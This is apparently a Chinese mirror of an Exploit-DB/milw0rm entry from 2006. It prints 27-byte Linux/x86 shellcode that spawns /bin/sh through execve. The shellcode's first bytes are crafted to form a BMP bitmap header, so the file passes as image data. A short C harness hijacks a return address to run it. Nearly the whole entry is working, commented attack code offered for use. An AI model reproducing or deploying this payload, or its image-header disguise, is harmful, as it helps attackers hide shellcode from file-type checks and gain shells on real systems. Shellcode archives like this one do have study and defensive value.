Linux/x86 - execve(/bin/sh) + '.BMP' Bitmap Header Shellcode (27 bytes)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1055674 漏洞类型
发布时间 2006-04-17 更新时间 2006-04-17
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13370
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
 * (linux/x86) - execve("/bin/sh", ["/bin/sh", NULL]) + Bitmap 24bit Header - 27 bytes
 *
 * root@magicbox:~# file linux-sh-bm24bhdr.bin
 * linux-sh-bm24bhdr.bin: PC bitmap data
 *
 * - izik <izik@tty64.org>
 */

char shellcode[] = 

	//
	// Bitmap 24bit Header (4 bytes)
	//

	"\x42"                  // inc %edx 
	"\x4d"                  // dec %ebp 
	"\x36"                  // ss 
	"\x91"                  // xchg %eax,%ecx 

	//
	// execve("/bin/sh", ["/bin/sh", NULL]);
	//

	"\x6a\x0b"              // push $0xb 
	"\x58"                  // pop %eax 
	"\x99"                  // cltd 
	"\x52"                  // push %edx 
	"\x68\x2f\x2f\x73\x68"  // push $0x68732f2f 
	"\x68\x2f\x62\x69\x6e"  // push $0x6e69622f 
	"\x89\xe3"              // mov %esp,%ebx 
	"\x52"                  // push %edx 
	"\x53"                  // push %ebx 
	"\x89\xe1"              // mov %esp,%ecx 
	"\xcd\x80";             // int $0x80 

int main(int argc, char **argv) {
	int *ret;
	ret = (int *)&ret + 2;
	(*ret) = (int) shellcode;
}

// milw0rm.com [2006-04-17]